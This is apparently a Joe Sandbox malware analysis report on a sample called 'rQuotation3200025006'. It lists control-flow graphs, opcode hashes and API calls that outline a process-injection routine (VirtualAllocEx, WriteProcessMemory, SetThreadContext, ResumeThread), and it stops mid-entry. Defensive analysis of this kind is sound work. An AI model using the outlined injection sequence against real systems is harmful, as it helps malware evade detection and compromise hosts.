                                        control_flow_graph 866 6cc15f0-6cc1685 868 6cc16be-6cc16de 866->868 869 6cc1687-6cc1691 866->869 874 6cc1717-6cc1746 868->874 875 6cc16e0-6cc16ea 868->875 869->868 870 6cc1693-6cc1695 869->870 872 6cc16b8-6cc16bb 870->872 873 6cc1697-6cc16a1 870->873 872->868 876 6cc16a5-6cc16b4 873->876 877 6cc16a3 873->877 883 6cc177f-6cc1839 CreateProcessA 874->883 884 6cc1748-6cc1752 874->884 875->874 879 6cc16ec-6cc16ee 875->879 876->876 878 6cc16b6 876->878 877->876 878->872 880 6cc16f0-6cc16fa 879->880 881 6cc1711-6cc1714 879->881 885 6cc16fc 880->885 886 6cc16fe-6cc170d 880->886 881->874 897 6cc183b-6cc1841 883->897 898 6cc1842-6cc18c8 883->898 884->883 887 6cc1754-6cc1756 884->887 885->886 886->886 888 6cc170f 886->888 889 6cc1758-6cc1762 887->889 890 6cc1779-6cc177c 887->890 888->881 892 6cc1764 889->892 893 6cc1766-6cc1775 889->893 890->883 892->893 893->893 894 6cc1777 893->894 894->890 897->898 908 6cc18d8-6cc18dc 898->908 909 6cc18ca-6cc18ce 898->909 911 6cc18ec-6cc18f0 908->911 912 6cc18de-6cc18e2 908->912 909->908 910 6cc18d0 909->910 910->908 914 6cc1900-6cc1904 911->914 915 6cc18f2-6cc18f6 911->915 912->911 913 6cc18e4 912->913 913->911 917 6cc1916-6cc191d 914->917 918 6cc1906-6cc190c 914->918 915->914 916 6cc18f8 915->916 916->914 919 6cc191f-6cc192e 917->919 920 6cc1934 917->920 918->917 919->920 922 6cc1935 920->922 922->922
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC1826
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: fa839659140ea91f235e43c02070157b266ed3c788faf85989ede0712a1c9dac
                                        • Instruction ID: a42aa83f1531dc6395f5e12983767d34a556cfbd6773facf1171c95ef09c6531
                                        • Opcode Fuzzy Hash: fa839659140ea91f235e43c02070157b266ed3c788faf85989ede0712a1c9dac
                                        • Instruction Fuzzy Hash: 34915B71D00619CFEB60CF69C841BDDBBB2FF44324F1885A9E848A7641DB749A85CF91
                                        Function 008AB159 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 923 8ab159-8ab177 924 8ab179-8ab186 call 8aa4e0 923->924 925 8ab1a3-8ab1a7 923->925 931 8ab188 924->931 932 8ab19c 924->932 927 8ab1bb-8ab1fc 925->927 928 8ab1a9-8ab1b3 925->928 934 8ab209-8ab217 927->934 935 8ab1fe-8ab206 927->935 928->927 979 8ab18e call 8ab3f0 931->979 980 8ab18e call 8ab400 931->980 932->925 936 8ab23b-8ab23d 934->936 937 8ab219-8ab21e 934->937 935->934 942 8ab240-8ab247 936->942 939 8ab229 937->939 940 8ab220-8ab227 call 8aa4ec 937->940 938 8ab194-8ab196 938->932 941 8ab2d8-8ab398 938->941 944 8ab22b-8ab239 939->944 940->944 974 8ab39a-8ab39d 941->974 975 8ab3a0-8ab3cb GetModuleHandleW 941->975 945 8ab249-8ab251 942->945 946 8ab254-8ab25b 942->946 944->942 945->946 949 8ab268-8ab271 call 8aa4fc 946->949 950 8ab25d-8ab265 946->950 954 8ab27e-8ab283 949->954 955 8ab273-8ab27b 949->955 950->949 956 8ab2a1-8ab2ae 954->956 957 8ab285-8ab28c 954->957 955->954 964 8ab2b0-8ab2ce 956->964 965 8ab2d1-8ab2d7 956->965 957->956 959 8ab28e-8ab29e call 8aa50c call 8aa51c 957->959 959->956 964->965 974->975 976 8ab3cd-8ab3d3 975->976 977 8ab3d4-8ab3e8 975->977 976->977 979->938 980->938
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 008AB3BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 18ee8a05bc485cd26a0631036d797a4aaf274ec55d86a662156252b4aeec689b
                                        • Instruction ID: 2c9fe62e904f8b018a58374610d1fd426c305fd0a913d319397e242f57d89276
                                        • Opcode Fuzzy Hash: 18ee8a05bc485cd26a0631036d797a4aaf274ec55d86a662156252b4aeec689b
                                        • Instruction Fuzzy Hash: 72816670A00B058FEB24DF69D45579ABBF1FF89304F008A2ED48ADBA51D774E849CB91
                                        Function 008A5E75 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 981 8a5e75-8a5f41 CreateActCtxA 983 8a5f4a-8a5fa4 981->983 984 8a5f43-8a5f49 981->984 991 8a5fb3-8a5fb7 983->991 992 8a5fa6-8a5fa9 983->992 984->983 993 8a5fc8 991->993 994 8a5fb9-8a5fc5 991->994 992->991 995 8a5fc9 993->995 994->993 995->995
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 008A5F31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 92f8ce1a047540074f5f02ed16d7779c78c9ba5d2aa1fa4a5f7c22b1691dbeaf
                                        • Instruction ID: 0c99d7aff413e656f039545806b4f69c6907a26982c96e75a2b263fa0a3c7da2
                                        • Opcode Fuzzy Hash: 92f8ce1a047540074f5f02ed16d7779c78c9ba5d2aa1fa4a5f7c22b1691dbeaf
                                        • Instruction Fuzzy Hash: 5D41E2B0C00619CFDB24CFA9C944BDDBBB5BF49304F24846AD408AB255DB756986CF90
                                        Function 008A49D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 997 8a49d4-8a5f41 CreateActCtxA 1000 8a5f4a-8a5fa4 997->1000 1001 8a5f43-8a5f49 997->1001 1008 8a5fb3-8a5fb7 1000->1008 1009 8a5fa6-8a5fa9 1000->1009 1001->1000 1010 8a5fc8 1008->1010 1011 8a5fb9-8a5fc5 1008->1011 1009->1008 1012 8a5fc9 1010->1012 1011->1010 1012->1012
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 008A5F31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3cb22381ef70b351e30f4f562bd386d12de22b62dd9203c361c21376f200e5b7
                                        • Instruction ID: e37ecb3a6f8b146981dee34f95ceea081651710ea5abbdc34f6bc2aa17657d47
                                        • Opcode Fuzzy Hash: 3cb22381ef70b351e30f4f562bd386d12de22b62dd9203c361c21376f200e5b7
                                        • Instruction Fuzzy Hash: A041D0B0C00719DEDB24CFA9C844B9DBBB5FF49304F20846AD408AB255DB756985CF90
                                        Function 06CC1361 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1014 6cc1361-6cc13b6 1016 6cc13b8-6cc13c4 1014->1016 1017 6cc13c6-6cc1405 WriteProcessMemory 1014->1017 1016->1017 1019 6cc140e-6cc143e 1017->1019 1020 6cc1407-6cc140d 1017->1020 1020->1019
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CC13F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 94cc5654d336e560c0695c8a762d505897ec1a3e9ddfa4099cd02062e8650b1f
                                        • Instruction ID: e9d74bffe38f2e0a618e9de2e2ebfdd35ff9b201f1f32303881f4580cd4cc28e
                                        • Opcode Fuzzy Hash: 94cc5654d336e560c0695c8a762d505897ec1a3e9ddfa4099cd02062e8650b1f
                                        • Instruction Fuzzy Hash: 7B2148B19003599FCB10CFAAC881BDEBBF5FF48324F14842EE958A7651C7789955CBA0
                                        Function 06CC1368 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CC13F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: ad2a750ab3249fc490870ea84017217b6ceb62e5fc96fc8663f643874fe932c0
                                        • Instruction ID: fd785078bed219f5ec0e0c4b00f9f8a63262e3b19a9534af4aedb21eccd41680
                                        • Opcode Fuzzy Hash: ad2a750ab3249fc490870ea84017217b6ceb62e5fc96fc8663f643874fe932c0
                                        • Instruction Fuzzy Hash: 882157B19003499FCB10CFAAC881BDEBBF5FF48324F14842DE958A7251C7789944CBA4
                                        Function 06CC1450 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CC14D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 4051a9305d1065f0fa394a2d568cf5b3767431dde80683f15e1d8d00af2700f2
                                        • Instruction ID: fdc75f15a481170dc2e3acb3c99b32462ec6493855fafdd582592b46286d956d
                                        • Opcode Fuzzy Hash: 4051a9305d1065f0fa394a2d568cf5b3767431dde80683f15e1d8d00af2700f2
                                        • Instruction Fuzzy Hash: B32136B18002499FCB10DFAAC881ADEFBF5FF48320F10842AE958A7250C7389945CBA1
                                        Function 06CC095B Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CC09DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: d82eb9f99352bbd7982ac2383e6e81af2d00a04515490487fdca4ba30786ebcb
                                        • Instruction ID: 7e9fe6780214243f26add2b20bf1273c9236aee6dae54347ecd770ef6a478ad6
                                        • Opcode Fuzzy Hash: d82eb9f99352bbd7982ac2383e6e81af2d00a04515490487fdca4ba30786ebcb
                                        • Instruction Fuzzy Hash: 682109B1D003098FDB50DFAAC4857EEBBF4AB48324F14842DD459A7240DB78A985CFA5
                                        Function 008ADA40 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008ADACF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 72b95296a658f1d92628b678ee10743935397de1314a382c04d10ff5f8bac0f3
                                        • Instruction ID: 1b385b531bce0a36856e6b24dcaec31b81cb9b74530df4941e95b312b02609a1
                                        • Opcode Fuzzy Hash: 72b95296a658f1d92628b678ee10743935397de1314a382c04d10ff5f8bac0f3
                                        • Instruction Fuzzy Hash: B62100B59042589FDB10CFAAE984AEEBFF5FB48310F14841AE959A7351C374A944CF60
                                        Function 06CC1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CC14D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ae6206c44382524e1366be3eda861d7f7d3898b719bb9b09c2004e711b176eb3
                                        • Instruction ID: e878a30c068d11f44184a43a5b8651e4e17de3d1122b46b706ee46fef7f81c22
                                        • Opcode Fuzzy Hash: ae6206c44382524e1366be3eda861d7f7d3898b719bb9b09c2004e711b176eb3
                                        • Instruction Fuzzy Hash: B72128B19003599FCB10DFAAC841ADEFBF5FF48320F10842DE558A7250C734A944CBA4
                                        Function 06CC0960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CC09DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 419a77ec2130988969e01698cb9e66234a928781f2d4ac2dac5a6ef909b79583
                                        • Instruction ID: abb0c7f19c78e7271eee3ef0b68f4646cae66a5f78fab4f1c5315f37a27ede8e
                                        • Opcode Fuzzy Hash: 419a77ec2130988969e01698cb9e66234a928781f2d4ac2dac5a6ef909b79583
                                        • Instruction Fuzzy Hash: 5D2107B19003098FDB50DFAAC4857EEBBF4AB88324F14842DD459A7240CB78A985CFA5
                                        Function 008ADA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008ADACF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 23af2056ef00781a78e29cdeaebf89c751ffa4f9be18ebb3b15072168b969027
                                        • Instruction ID: 0d8d354f08834398bd25d846700e70070297be812fddc0e5e58956142caca268
                                        • Opcode Fuzzy Hash: 23af2056ef00781a78e29cdeaebf89c751ffa4f9be18ebb3b15072168b969027
                                        • Instruction Fuzzy Hash: E021C2B59003589FDB10CFAAD984ADEFBF9FB48320F14841AE958A7350D374A944CFA5
                                        Function 06CC5CD3 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: e2afc1dd7a9e7fd9af1c9b98ecf8a7557be36970736cae7752da6bfba0f3727b
                                        • Instruction ID: 2d83bce922a6aa4fcdec94cb90e66fc7588f9e0dc751993828a09a3f271eec2a
                                        • Opcode Fuzzy Hash: e2afc1dd7a9e7fd9af1c9b98ecf8a7557be36970736cae7752da6bfba0f3727b
                                        • Instruction Fuzzy Hash: 992188B1D043698EDB20EFAAD9087EEBBF0AF48320F50841DC441B7251C7796A54CFA0
                                        Function 06CC12A6 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CC1316
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 695b7d97bdd11fd13660dd15f8ecdee4d6312dc7df3be16f084851b445873d7c
                                        • Instruction ID: 3bc0277b825e0aa20edc653be2840d385aa48593205270873b2161716c1af52d
                                        • Opcode Fuzzy Hash: 695b7d97bdd11fd13660dd15f8ecdee4d6312dc7df3be16f084851b445873d7c
                                        • Instruction Fuzzy Hash: D51179B18002488FCB10DFAAC845BDEFFF5EF88324F248419E559A7250C7359944CFA0
                                        Function 06CC12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CC1316
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 8c7b54c0f43cc2d620397a40b3e477ab160d11eb7a98dc067260539a7d91ba3d
                                        • Instruction ID: 4c8a929d2102b53a37d81973bf9dd5e6af47a0695a3d2e0d4e620ccb7ac3ac6f
                                        • Opcode Fuzzy Hash: 8c7b54c0f43cc2d620397a40b3e477ab160d11eb7a98dc067260539a7d91ba3d
                                        • Instruction Fuzzy Hash: EE1167B18002488FCB10DFAAC844BDEFFF5EF88324F248419E559A7250C735A944CFA4
                                        Function 06CC08AB Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 185aa8c58c8cc66da227a74f8ac6107cc00446bc1cb18bd74b5bb31281f25aa9
                                        • Instruction ID: a9786da51a5630f563db68c45b2bdcff5f3f60c67b8a961fcef479678bb9b18c
                                        • Opcode Fuzzy Hash: 185aa8c58c8cc66da227a74f8ac6107cc00446bc1cb18bd74b5bb31281f25aa9
                                        • Instruction Fuzzy Hash: 601128B19002488BDB20DFAAC4457DEFBF5EB88324F248419D459A7250C675A945CFA4
                                        Function 06CC5C30 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 62173b1356127d4e1762c728264249a4b828b2c4ab50711854221bfa3d84b74a
                                        • Instruction ID: 21f6a5ebcdef49615a913d8290dd8220f47c056d11f8c6f32a140e4bec14afb1
                                        • Opcode Fuzzy Hash: 62173b1356127d4e1762c728264249a4b828b2c4ab50711854221bfa3d84b74a
                                        • Instruction Fuzzy Hash: 511106B58003499FDB10DF99D845BDEFFF8EB48324F208819E958A7610C375A995CFA1
                                        Function 06CC08B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: d278fc2ba67125849869a3a0781406bcdd2e6e657385c0f3b1f151d68c555ab8
                                        • Instruction ID: 7470d19b615d034a955b91ac99ecb7887bb2573916c4cb2a7f2789762c1d72f1
                                        • Opcode Fuzzy Hash: d278fc2ba67125849869a3a0781406bcdd2e6e657385c0f3b1f151d68c555ab8
                                        • Instruction Fuzzy Hash: CF1125B19002488BDB20DFAAC8457EEFBF5EB88324F208429D459A7250CA75A944CFA4
                                        Function 008AB358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 008AB3BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a5f48a634163c10b7d0523a08d85bc33667278d9cc549f7f68a483be37861673
                                        • Instruction ID: c2c9f3a5b51cd3444e4de616863eeec8e389922cf20f5ec59c1cbc61ad3d24da
                                        • Opcode Fuzzy Hash: a5f48a634163c10b7d0523a08d85bc33667278d9cc549f7f68a483be37861673
                                        • Instruction Fuzzy Hash: 8811DFB5C006498FDB10CF9AD844ADEFBF4EB89324F10842AD569A7610C379A945CFA5
                                        Function 06CC2D94 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: e32097911c46248522e8db540b2d12039812ec36f54cf7f178f7aa374713e8b5
                                        • Instruction ID: fe5fd9dd5f40e2bd9859d69e9fe50e1360b830e911687d55e1a2626c761b27f6
                                        • Opcode Fuzzy Hash: e32097911c46248522e8db540b2d12039812ec36f54cf7f178f7aa374713e8b5
                                        • Instruction Fuzzy Hash: E211F2B5800348DFDB50DF9AD989BDEBBF8EB48324F108419E558A7210C375A994CFA5
                                        Function 0084D3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 273348986e07ebb92f487c0105c93ef82db34f1ca55855e8bd895e3dba19f389
                                        • Instruction ID: f77daf04066af8b26947c99a71e1af72a7f02edc610146ea3a235621c4b9c48f
                                        • Opcode Fuzzy Hash: 273348986e07ebb92f487c0105c93ef82db34f1ca55855e8bd895e3dba19f389
                                        • Instruction Fuzzy Hash: 7E212571500308DFDB05DF14D9C0B26BF65FB98328F20C169E9098B256C33AE856CAA2
                                        Function 0085D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730340384.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_85d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c086ab5b44fa26972e27be6074a3888082b33aff9bbba778fd39e0fdb2a53cbb
                                        • Instruction ID: 692c54aa6bd2fcfd0dfbf5471052000ce4a88b25bf02cf8042dafd29cfee7922
                                        • Opcode Fuzzy Hash: c086ab5b44fa26972e27be6074a3888082b33aff9bbba778fd39e0fdb2a53cbb
                                        • Instruction Fuzzy Hash: 5E21D075604704DFDB24DF14D984B26BBA5FB84319F20C569DC0A8B296C33AD84BCA61
                                        Function 0085D005 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730340384.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_85d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7f6534e17e5a32c2e21340d8c06f739429e1bee78224e79ee57845977e2ea11
                                        • Instruction ID: 23dc1b2c55645c75081f3aa42f84b0902eb39ba4aa541ec396c116fdf63406ba
                                        • Opcode Fuzzy Hash: e7f6534e17e5a32c2e21340d8c06f739429e1bee78224e79ee57845977e2ea11
                                        • Instruction Fuzzy Hash: D1219F755097808FDB12CF24D994B15BF71FB46314F28C5EADC498B6A7C33A980ACB62
                                        Function 0084D3D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction ID: 1a703aebb10326f5e4c17d147f6f123a9fbfddae4647cf8d14704afdb7d0a785
                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction Fuzzy Hash: 7C11E176404344CFCB02CF10D5C4B16BF71FB94324F24C2A9D8094B256C33AE85ACBA1
                                        Function 0084D731 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adc614c1e49f341afb60f785684f8267aa15145951e5e94ca9b7adbaad5da487
                                        • Instruction ID: 5dc923d8d42643478d5ce98919d5301f21ecc98a45749aa0ac0dad763cea97d1
                                        • Opcode Fuzzy Hash: adc614c1e49f341afb60f785684f8267aa15145951e5e94ca9b7adbaad5da487
                                        • Instruction Fuzzy Hash: 5601A7711093489AE7114B25CDC4767FFD8FF81364F28C56AED098A296C6799C40C671
                                        Function 0084D730 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
